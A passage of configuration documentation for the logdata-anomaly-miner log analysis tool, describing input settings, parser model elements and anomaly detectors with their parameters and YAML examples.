Log.Rotation.MaxBytes: 1048576 Log.Rotation.BackupCount ~~~~~~~~~~~~~~~~~~~~~~~~ * Type: number of old logfiles * Default: 5 Defines the number of logfiles saved after rotation of "Log.RemoteControlLogFile", "Log.StatisticsFile" and "Log.DebugFile". .. code-block:: yaml Log.Rotation.BackupCount: 5 ----- Input ----- timestamp_paths ~~~~~~~~~~~~~~~ * Type: string or list of strings Parser paths to DateTimeModelElements to set timestamp of log events. .. code-block:: yaml timestamp_paths: '/model/time' .. code-block:: yaml timestamp_paths: - '/parser/model/time' - '/parser/model/type/execve/time' - '/parser/model/type/proctitle/time' - '/parser/model/type/syscall/time' - '/parser/model/type/path/time' multi_source ~~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Flag to enable chronologically correct parsing from multiple input-logfiles. .. code-block:: yaml multi_source: True eol_sep ~~~~~~~ * Default: '\n' End of Line seperator for events. .. note:: Enables parsing of multiline logs. .. code-block:: yaml eol_sep: '\r\n' json_format ~~~~~~~~~~~ * Type: boolean (True,False) * Default: False Enables parsing of logs in json-format. .. code-block:: yaml json_format: True suppress_unparsed ~~~~~~~~~~~~~~~~~ * Default: False Boolean value that allows to suppress anomaly output about unparsed log atoms. .. code-block:: yaml suppress_unparsed: True ------- Parsing ------- There are some predefined standard-model-elements like *IpAddressDataModelElement*, *DateTimeModelElement*, *FixedDataModelElement* and so on. They are located in the python-source-tree of logdata-anomaly-miner. A comprehensive list of all possible standard-model-elements can be found below. Using these standard-model-elements it is possible to create custom parser models. Currently there are two methods of doing it: 1. Using a python-script that is located in */etc/aminer/conf-enabled*: .. code-block:: python """ /etc/aminer/conf-enabled/ApacheAccessParsingModel.py""" from aminer.parsing.DateTimeModelElement import DateTimeModelElement from aminer.parsing.DecimalIntegerValueModelElement import DecimalIntegerValueModelElement from aminer.parsing.DelimitedDataModelElement import DelimitedDataModelElement from aminer.parsing.FirstMatchModelElement import FirstMatchModelElement from aminer.parsing.FixedDataModelElement import FixedDataModelElement from aminer.parsing.FixedWordlistDataModelElement import FixedWordlistDataModelElement from aminer.parsing.IpAddressDataModelElement import IpAddressDataModelElement from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.SequenceModelElement import SequenceModelElement from aminer.parsing.VariableByteDataModelElement import VariableByteDataModelElement def get_model(): """Return a model to parse Apache Access logs from the AIT-LDS.""" alphabet = b'!"#$%&\'()*+,-./0123456789:;<>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ\\^_`abcdefghijklmnopqrstuvwxyz{|}~=[]' model = SequenceModelElement('model', [ FirstMatchModelElement('client_ip', [ IpAddressDataModelElement('client_ip'), FixedDataModelElement('localhost', b'::1') ]), FixedDataModelElement('sp1', b' '), VariableByteDataModelElement('client_id', alphabet), FixedDataModelElement('sp2', b' '), VariableByteDataModelElement('user_id', alphabet), FixedDataModelElement('sp3', b' ['), DateTimeModelElement('time', b'%d/%b/%Y:%H:%M:%S'), FixedDataModelElement('sp4', b' +'), DecimalIntegerValueModelElement('tz'), FixedDataModelElement('sp5', b'] "'), FirstMatchModelElement('fm', [ FixedDataModelElement('dash', b'-'), SequenceModelElement('request', [ FixedWordlistDataModelElement('method', [ b'GET', b'POST', b'PUT', b'HEAD', b'DELETE', b'CONNECT', b'OPTIONS', b'TRACE', b'PATCH']), FixedDataModelElement('sp6', b' '), DelimitedDataModelElement('request', b' ', b'\\'), FixedDataModelElement('sp7', b' '), DelimitedDataModelElement('version', b'"'), ]) ]), FixedDataModelElement('sp8', b'" '), DecimalIntegerValueModelElement('status_code'), FixedDataModelElement('sp9', b' '), DecimalIntegerValueModelElement('content_size'), OptionalMatchModelElement( 'combined', SequenceModelElement('combined', [ FixedDataModelElement('sp10', b' "'), DelimitedDataModelElement('referer', b'"', b'\\'), FixedDataModelElement('sp11', b'" "'), DelimitedDataModelElement('user_agent', b'"', b'\\'), FixedDataModelElement('sp12', b'"'), ])), ]) return model This parser can be used as "type" in **/etc/aminer/config.yml**: .. code-block:: yaml Parser: - id: 'apacheModel' type: ApacheAccessModel name: 'apache' .. warning:: Please do not create files with the ending "ModelElement.py" in /etc/aminer/conf-enabled! 2. Configuring the parser-model inline in **/etc/aminer/config.yml** .. code-block:: yaml Parser: - id: host_name_model type: VariableByteDataModelElement name: 'host' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: identity_model type: VariableByteDataModelElement name: 'ident' args: '-.01234567890abcdefghijklmnopqrstuvwxyz:' - id: user_name_model type: VariableByteDataModelElement name: 'user' args: '0123456789abcdefghijklmnopqrstuvwxyz.-' - id: new_time_model type: DateTimeModelElement name: 'time' date_format: '[%d/%b/%Y:%H:%M:%S +0000]' - id: sq3 type: FixedDataModelElement name: 'sq3' args: ' "' - id: request_method_model type: FixedWordlistDataModelElement name: 'method' args: - 'GET' - 'POST' - 'PUT' - 'HEAD' - 'DELETE' - 'CONNECT' - 'OPTIONS' - 'TRACE' - 'PATCH' - id: request_model type: VariableByteDataModelElement name: 'request' args: '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ.-/()[]{}!$%&=?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]()^_`abcdefghijklmnopqrstuvwxyz{|}~' - id: timestamp_model type: DateTimeModelElement name: 'timestamp' date_format: '%Y-%m-%dT%H:%M:%S+00:00' - id: optional_model type: OptionalMatchModelElement name: 'opt' args: timestamp_model - id: 'START' start: True type: JsonStringModelElement name: accesslog strict: True ignore_null: False key_parser_dict: "time": optional_model "agent": agent .. warning:: This parser does not work with multiline json-logs .. note:: Use OptionalMatchModelElement to make the subparser optional with null-values OptionalMatchModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define optional model elements. * **args**: the id of the optional element that will be skipped if it does not match .. code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: opt type: OptionalMatchModelElement name: 'opt' args: user RepeatedElementDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model allows to define elements that repeat a number of times. * **args**: a string or list containing the following parameters: 1. repeated_element: id of element which is repeated 2. min_repeat: minimum amount of times the repeated element has to occur, default is 1 3. max_repeat: minimum amount of times the repeated element has to occur, default is 1048576 .. code-block:: yaml Parser: - id: delimitedDataModelElement type: DelimitedDataModelElement name: 'DelimitedDataModelElement' consume_delimiter: True delimiter: ';' - id: repeatedElementDataModelElement type: RepeatedElementDataModelElement name: 'RepeatedElementDataModelElement' args: - sequenceModelElement - 3 SequenceModelElement ~~~~~~~~~~~~~~~~~~~~ This model defines a sequence of elements that all have to match. * **args**: a list of elements that form the sequence .. code-block:: yaml Parser: - id: user type: FixedDataModelElement name: 'User' args: 'User ' - id: username type: DelimitedDataModelElement name: 'Username' consume_delimiter: True delimiter: ' ' - id: ip type: IpAddressDataModelElement name: 'IP' - id: seq type: SequenceModelElement name: 'seq' args: - user - username - ip VariableByteDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string of character bytes with variable length from a given alphabet. * **args**: string specifying the allowed characters .. code-block:: yaml Parser: - id: version type: VariableByteDataModelElement name: 'version' args: '0123456789.' WhiteSpaceLimitedDataModelElement ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This model defines a string that is delimited by a white space. .. code-block:: yaml Parser: - id: whiteSpaceLimitedDataModelElement type: WhiteSpaceLimitedDataModelElement name: 'WhiteSpaceLimitedDataModelElement' --------- Analysing --------- All detectors have the following parameters and may have additional specific parameters that are defined in the respective sections. * **id**: must be a unique string * **type**: must be an existing Analysis component (required) .. _AllowlistViolationDetector: AllowlistViolationDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for log atoms not matching any allowlisted rule. * **allowlist_rules**: list of rules executed in same way as inside Rules.OrMatchRule.list of rules executed in same way as inside Rules.OrMatchRule (required, list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: PathExistsMatchRule id: path_exists_match_rule1 path: "/model/LoginDetails/PastTime/Time/Minutes" - type: ValueMatchRule id: value_match_rule path: "/model/LoginDetails/Username" value: "root" - type: OrMatchRule id: or_match_rule sub_rules: - "path_exists_match_rule1" - "value_match_rule" - type: AllowlistViolationDetector id: Allowlist allowlist_rules: - "or_match_rule" .. seealso:: :ref:`MatchRules` CharsetDetector ~~~~~~~~~~~~~~~ This detector generates anomalies for new characters in parsed elements and extends the allowed alphabet when learning is active. * **paths** parser paths of values to be analyzed; multiple paths mean that all values occurring in these paths are considered for character detection (required, list of strings). * **id_path_list** list of strings that specify group identifiers for which alphabets should be learned (list of strings, defaults to empty list). * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **learn_mode** specifies whether value ranges should be extended when values outside of ranges are observed (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'CharsetDetector' paths: - '/parser/value' learn_mode: True EnhancedNewMatchPathValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ In addition to detecting new value combination (see NewMatchPathValueComboDetector), this detector also stores combo occurrence times and amounts, and allows to execute functions on tuples that need to be defined in the python code first. * **paths**: the list of values to extract from each match to create the value combination to be checked (required, list of strings). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, defaults to False). * **tuple_transformation_function**: when not None, this function will be invoked on each extracted value combination list to transform it. It may modify the list directly or create a new one to return it (string, defaults to None). * **learn_mode**: when set to True, this detector will report a new value only the first time before including it in the known values set automatically (boolean). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). .. code-block:: yaml Analysis: - type: EnhancedNewMatchPathValueComboDetector id: EnhancedNewValueCombo paths: - "/model/DailyCron/UName" - "/model/DailyCron/JobNumber" tuple_transformation_function: "demo" learn_mode: True EntropyDetector ~~~~~~~~~~~~~~ This detector monitors and learns occurrence probabilities of character pairs in values. Many unlikely character pairs in values suggest that they are randomly generated or not fitting the learned character patterns. * **paths** parser paths of values to be analyzed. Multiple paths mean that all values occurring in these paths are considered as if they occur in the same field (required, list of strings). * **prob_thresh** limit for the average probability of character pairs for which anomalies are reported (float, defaults to 0.05). * **default_probs** initializes the probabilities with default values from https://github.com/markbaggett/freq (boolean, defaults to False). * **skip_repetitions** boolean that determines whether only distinct values are used for character pair counting. This counteracts the problem of imbalanced word frequencies that distort the frequency table generated in a single aminer run (boolean, defaults to False). * **persistence_id** name of persistency document (string, defaults to "Default"). * **learn_mode** when set to True, the detector will extend the table of character pair frequencies based on new values (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). .. code-block:: yaml Analysis: - type: 'EntropyDetector' paths: - '/parser/value' prob_thresh: 0.05 default_freqs: false skip_repetitions: false learn_mode: True EventCorrelationDetector ~~~~~~~~~~~~~~~~~~~~~~~~ This module defines an evaluator and generator for event rules. The overall idea of generation is 1. For each processed event A, randomly select another event B occurring within queue_delta_time. 2. If B chronologically occurs after A, create the hypothesis A => B (observing event A implies that event B must be observed within current_time+queue_delta_time). If B chronologically occurs before A, create the hypothesis B <= A (observing event A implies that event B must be observed within currentTime-queueDeltaTime). 3. Observe for a long time (max_observations) whether the hypothesis holds. 4. If the hypothesis holds, transform it to a rule. Otherwise, discard the hypothesis. * **paths**: a list of paths where values or value combinations used for correlation occur. If this parameter is not set, correlation is done on event types instead (list of strings, defaults to empty list). * **output_event_handlers**: a list of event handler identifiers that the detector should forward the anomalies to (list of strings, defaults to empty list). * **max_hypotheses** maximum amount of hypotheses and rules hold in memory (integer, defaults to 1000). * **hypothesis_max_delta_time** time span in seconds of events considered for hypothesis generation (float, defaults to 5.0). * **generation_probability** probability in [0, 1] that currently processed log line is considered for hypothesis with each of the candidates (float, defaults to 1.0). * **generation_factor** likelihood in [0, 1] that currently processed log line is added to the set of candidates for hypothesis generation (float, defaults to 1.0). * **max_observations** maximum amount of evaluations before hypothesis is transformed into a rule or discarded or rule is evaluated (integer, defaults to 500). * **p0** expected value for hypothesis evaluation distribution (float, defaults to 0.9). * **alpha** confidence value for hypothesis evaluation (float, defaults to 0.05). * **candidates_size** maximum number of stored candidates used for hypothesis generation (integer, defaults to 10). * **hypotheses_eval_delta_time** duration in seconds between hypothesis evaluation phases that remove old hypotheses that are likely to remain unused (float, 120.0). * **delta_time_to_discard_hypothesis** time span in seconds required for old hypotheses to be discarded (float, defaults to 180.0). * **check_rules_flag** specifies whether existing rules are evaluated (boolean, defaults to True). * **ignore_list**: a list of parser paths that are ignored for analysis by this detector (list of strings, defaults to empty list). * **constraint_list**: a list of parser paths that the detector will be constrained to, i.e., other branches of the parser tree are ignored (list of strings, defaults to empty list). * **output_logline**: a boolean that specifies whether full log event parsing information should be appended to the anomaly when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **learn_mode**: specifies whether new hypotheses and rules are generated (boolean). .. code-block:: yaml Analysis: - type: EventCorrelationDetector id: EventCorrelationDetector check_rules_flag: True hypothesis_max_delta_time: 1.0 learn_mode: True EventCountClusterDetector ~~~~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector that clusters count vectors of event and value occurrences. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **id_path_list** parser paths of values for which separate count vectors should be generated (list of strings, defaults to empty list). * **num_windows** the number of vectors stored in the models (integer, defaults to 50). * **confidence_factor** minimum similarity threshold in range [0, 1] for detection (float, defaults to 0.33). * **idf** when true, value counts are weighted higher when they occur with fewer id_paths (requires that id_path_list is set) (boolean, defaults to False). * **norm** when true, count vectors are normalized so that only relative occurrence frequencies matter for detection (boolean, defaults to False). * **add_normal** when true, count vectors are also added to the model when they exceed the similarity threshold (boolean, defaults to False). * **check_empty_windows** when true, empty count vectors are generated for time windows without event occurrences (boolean, defaults to False). * **persistence_id** name of persistence document (string, defaults to "Default"). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list list** of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **stop_learning_time** switch the learn_mode to False after the time (float, defaults to None). * **stop_learning_no_anomaly_time** switch the learn_mode to False after no anomaly was detected for that time (float, defaults to None). .. code-block:: yaml Analysis: - id: "eccd" type: "EventCountClusterDetector" window_size: 10 idf: True confidence_factor: 0.7 id_path_list: - '/parser/idp' paths: - '/parser/val' EventFrequencyDetector ~~~~~~~~~~~~~~~~~~~~~~ This module defines a detector for event and value frequency deviations. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **scoring_path_list** parser paths of values to be analyzed by following event handlers like the ScoringEventHandler. Multiple paths mean that values are analyzed by their combined occurrences. * **unique_path_list** parser paths of values where only unique value occurrences should be counted for every value occurring at paths. * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **window_size** the length of the time window for counting in seconds (float, defaults to 600). * **num_windows** the number of previous time windows considered for expected frequency estimation (integer, defaults to 50). * **confidence_factor** defines range of tolerable deviation of measured frequency from expected frequency according to occurrences_mean +- occurrences_std / self.confidence_factor. Default value is 0.33 = 3 * sigma deviation. confidence_factor must be in range [0, 1] (float, defaults to 0.33). * **empty_window_warnings** whether anomalies should be generated for too small window sizes. * **early_exceeding_anomaly_output** states if a anomaly should be raised the first time the appearance count exceedes the range. * **set_lower_limit** sets the lower limit of the frequency test to the specified value. * **set_upper_limit** sets the upper limit of the frequency test to the specified value. * **learn_mode** specifies whether new frequency measurements override ground truth frequencies (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventFrequencyDetector id: EventFrequencyDetector window_size: 10 EventSequenceDetector ~~~~~~~~~~~~~~~~~~~~~ This module defines an detector for event and value sequences. The concept is based on STIDE which was first published by Forrest et al. * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, defaults to empty list). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). * **seq_len** the length of the sequences to be learned (larger lengths increase precision, but may overfit the data). (integer, defaults to 3). * **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, defaults to False). * **ignore_list** list of paths that are not considered for analysis, i.e., events that contain one of these paths are omitted (list of strings, defaults to empty list). * **constraint_list** list of paths that have to be present in the log atom to be analyzed (list of strings, defaults to empty list). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True (boolean, defaults to False). * **persistence_id**: the name of the file where the learned models are stored (string, defaults to "Default"). .. code-block:: yaml Analysis: - type: EventSequenceDetector id: EventSequenceDetector seq_len: 4 paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' EventTypeDetector ~~~~~~~~~~~~~~~~~ This component serves as a basis for the VariableTypeDetector, VariableCorrelationDetector, TSAArimaDetector and PathArimaDetector. It saves a list of the values to the single paths and tracks the time for the TSAArimaDetector. * **paths** parser paths of values to be analyzed (list of strings, defaults to empty list). * **id_path_list** one or more paths that specify the trace of the sequence detection, i.e., incorrect sequences that are generated by interleaved events can be avoided when event sequence identifiers are available (list of strings, defaults to empty list). * **allow_missing_id** specifies whether log atoms without id path should be omitted (boolean, defaults to False. only if id path is set). * **allowed_id_tuples** list of the allowed id tuples. Log atoms with id tuples not in this list are not analyzed, when this list is not empty. * **persistence_id** the name of the file where the learned models are stored (string, defaults to "Default"). * **max_num_vals** maximum number of lines in the value list before it is reduced (integer, defaults to 1500). * **min_num_vals** number of the values which the list is being reduced to (integer, defaults to 1000). * **save_values** if False the values of the paths are not saved for further analysis. The values are not needed for the TSAArimaDetector (boolean, defaults to True). .. code-block:: yaml Analysis: - type: 'EventTypeDetector' id: ETD id_path_list: - '/model/type/syscall/id' allow_missing_id: True save_values: False .. _HistogramAnalysis: HistogramAnalysis ~~~~~~~~~~~~~~~~~ This component performs a histogram analysis on one or more input properties. The properties are parsed values denoted by their parsing path. Those values are then handed over to the selected "binning function", that calculates the histogram bin. * Binning: Binning can be done using one of the predefined binning functions or by creating own subclasses from "HistogramAnalysis.BinDefinition". * LinearNumericBinDefinition: Binning function working on numeric values and sorting them into bins of same size. * ModuloTimeBinDefinition: Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **histogram_defs**: list of tuples. First element of the tuple contains the target property path to analyze. The second element contains the id of a bin_definition(LinearNumericBinDefinition or ModuloTimeBinDefinition). List(strings) **Required** * **report_interval**: Report_interval delay in seconds between creaton of two reports. The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) **Required** * **reset_after_report_flag**: Zero counters after the report was sent. Boolean(Default: true) * **persistence_id'**: the name of the file where the learned models are stored. String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to. List(strings) * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True - type: HistogramAnalysis id: HistogramAnalysis histogram_defs: [["/model/RandomTime/Random", "linear_numeric_bin_definition"]] report_interval: 10 .. _PathDependentHistogramAnalysis: PathDependentHistogramAnalysis ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates a histogram for only a single input property, e.g. an IP address, but for each group of correlated match pathes. Assume there two pathes that include the input property but they separate after the property was found on the path. This might be for example the client IP address in ssh log atoms, where the parsing path may split depending if this was a log atom for a successful login, logout or some error. This analysis component will then create separate histograms, one for the path common to all atoms and one for each disjunct part of the subpathes found. The component uses the same binning functions as the standard HistogramAnalysis.HistogramAnalysis, see documentation there. * **path**: The property-path. String(Required) * **bin_definition**: The id of a bin_definition(LinearNumericBinDefini tion or ModuloTimeBinDefinition). String(Required) * **report_interval**: Report_interval delay in seconds between creaton of two reports. The parameter is applied to the parsed record data time, not the system time. Hence reports can be delayed when no data is received. Integer(min: 1) * **reset_after_report_flag**: Zero counters after the report was sent. Boolean(Default: true) * **persistence_id'**: the name of the file where the learned models are stored. String(Default: 'Default') * **output_logline**: specifies whether the full parsed log atom should be provided in the output. Boolean(Default: false) * **output_event_handlers**: List of event-handler-id to send the report to List(strings). * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. Boolean(Default: false) .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True - type: PathDependentHistogramAnalysis id: PathDependentHistogramAnalysis path: "/model/RandomTime" bin_definition: "modulo_time_bin_definition" report_interval: 10 LinearNumericBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on numeric values and sorting them into bins of same size. * **lower_limit**: Start on lowest bin. Integer or Float **Required** * **bin_size**: Size of bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: LinearNumericBinDefinition id: linear_numeric_bin_definition lower_limit: 50 bin_size: 5 bin_count: 20 outlier_bins_flag: True .. seealso:: :ref:`HistogramAnalysis` ModuloTimeBinDefinition ~~~~~~~~~~~~~~~~~~~~~~~ Binning function working on parsed datetime values but applying a modulo function to them. This is useful for analysis of periodic activities. * **modulo_value**: Modulo values in seconds. * **time_unit**: Division factor to get down to reporting unit * **lower_limit**: Start on lowest bin. Integer or Float **Required** * **bin_size**: Size of bin in reporting units. Size of bin in reporting units. Integer(min 1) **Required** * **bin_count**: Number of bins. Integer(min 1) **Required** * **outlier_bins_flag**: Disable outlier bins. Boolean. Default: False * **output_event_handlers**: List of handlers to send the report to. * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: ModuloTimeBinDefinition id: modulo_time_bin_definition modulo_value: 86400 time_unit: 3600 lower_limit: 0 bin_size: 1 bin_count: 24 outlier_bins_flag: True .. seealso:: :ref:`PathDependentHistogramAnalysis` MatchFilter ~~~~~~~~~~~ This component creates events for specified paths and values. * **paths**: List of paths defined as strings(Required) * **value_list**: List of values(Required) * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: a boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchFilter id: MatchFilter paths: - "/model/Random" value_list: - 1 - 10 - 100 MatchValueAverageChangeDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector calculates the average of a given list of values to monitor. Reports are generated if the average of the latest diverges significantly from the values observed before. * **timestamp_path**: Use this path value for timestamp based bins. String (**required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **min_bin_elements**: Evaluate the latest bin only after at least that number of elements was added to it. Integer, min: 1 (**required**) * **min_bin_time**: Evaluate the latest bin only when the first element is received after min_bin_time has elapsed. Integer, min: 1 (**required**) * **debug_mode**: Enables debug output. Boolean(Default: False) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchValueAverageChangeDetector id: MatchValueAverageChange timestamp_path: None paths: - "/model/Random" min_bin_elements: 100 min_bin_time: 10 MatchValueStreamWriter ~~~~~~~~~~~~~~~~~~~~~~ This component extracts values from a given match and writes them to a stream. This can be used to forward these values to another program (when stream is a wrapped network socket) or to a file for further analysis. A stream is used instead of a file descriptor to increase performance. To flush it from time to time, add the writer object also to the time trigger list. * **stream**: Stream to write the value of the match to. Possible values: 'sys.stdout' or 'sys.stderr' ( **required**) * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **separator**: Use this string as a seperator for the output. String ( **required**) * **missing_value_string**: Write this string if the value is missing. ( **required**) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MatchValueStreamWriter id: MatchValueStreamWriter stream: "sys.stdout" paths: - "/model/Sensors/CPUTemp" - "/model/Sensors/CPUWorkload" - "/model/Sensors/DTM" MinimalTransitionTimeDetector ~~~~~~~~~~~~~~~~~~~~~ This module defines an detector for minimal transition times between states (e.g. value combinations of stated paths). * **paths** parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed (list of strings, **required**). * **id_path_list** parser paths where id values can be stored in all relevant log event types (list of strings, **required**). * **ignore_list** parser paths that are not considered for analysis, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable (list of strings, default: []). * **allow_missing_id** when set to True, the detector will also use matches, where one of the paths from target_path_list does not refer to an existing parsed data object (boolean, default: False). * **num_log_lines_solidify_matrix** number of processed log lines after which the matrix is solidified. This process is periodically repeated (integer, default: 10000). * **time_output_threshold** threshold for the tested minimal transition time which has to be exceeded to be tested (float, default: 0). * **anomaly_threshold** threshold for the confidence which must be exceeded to raise an anomaly (float, default: 0.05). * **persistence_id** name of persistency document (string, default: 'Default'). * **learn_mode** specifies whether newly observed sequences should be added to the learned model (boolean, default: True). * **output_logline** specifies whether the full parsed log atom should be provided in the output (boolean, default: False). .. code-block:: yaml Analysis: - type: MinimalTransitionTimeDetector id: MinimalTransitionTimeDetector paths: - '/model/type/syscall/syscall' id_path_list: - '/model/type/syscall/id' anomaly_threshold: 0.05 MissingMatchPathValueDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This component creates events when an expected value is not seen within a given timespan. For example because the service was deactivated or logging disabled unexpectedly. This is complementary to the function provided by NewMatchPathValueDetector. For each unique value extracted by target_path_list, a tracking record is added to expected_values_dict. It stores three numbers: the timestamp the extracted value was last seen, the maximum allowed gap between observations and the next alerting time when currently in error state. When in normal (alerting) state, the value is zero. * **paths**: List of match paths to analyze in this detector. List of strings( **required**) * **learn_mode** specifies whether newly observed value combinations should be added to the learned model (boolean). * **check_interval**: This integer(seconds) defines the interval in which pre-set or learned values need to appear. Integer min:1 (Default: 3600) * **realert_interval**: This integer(seconds) defines the interval in which the AMiner should alert us about missing token values. Integer min: 1 (Default: 3600) * **persistence_id**: The name of the file where the learned models are stored. String * **output_logline**: Defines if logline should be added to the output. Boolean(Default: False) * **output_event_handlers**: List of strings with id's of the event_handlers * **suppress**: A boolean that suppresses anomaly output of that detector when set to True. .. code-block:: yaml Analysis: - type: MissingMatchPathValueDetector id: MissingMatch paths: - "/model/DiskReport/Space" check_interval: 2 realert_interval: 5 learn_mode: True .. seealso:: `Wiki: HowTo MissingMatchPathValueDetector `_ NewMatchIdValueComboDetector ~~~~~~~~~~~~~~~~~~~~~~~~~~~~ This detector works similar to the NewMatchPathValueComboDetector, but allows to generate combos across multiple log events that are connected by a common value, e.g., trace ID. * **paths** parser paths of values to be analyzed (required, list of strings). * **id_path_list** one or more paths that specify trace information, i.e., an identifier that specifies which log events belong together (required, list of strings, defaults to empty list). * **min_allowed_time_diff** the minimum amount of time in seconds after the first appearance of a log atom with a specific id that is waited for other log atoms with the same id to occur. The maximum possible time to keep an incomplete combo is 2*min_allowed_time_diff (required, float, defaults to 5.0). * **output_event_handlers** for handling events, e.g., print events to stdout (list of strings, defaults to empty list). * **allow_missing_values**: when set to True, the detector will also use matches, where one of the paths does not refer to an existing parsed 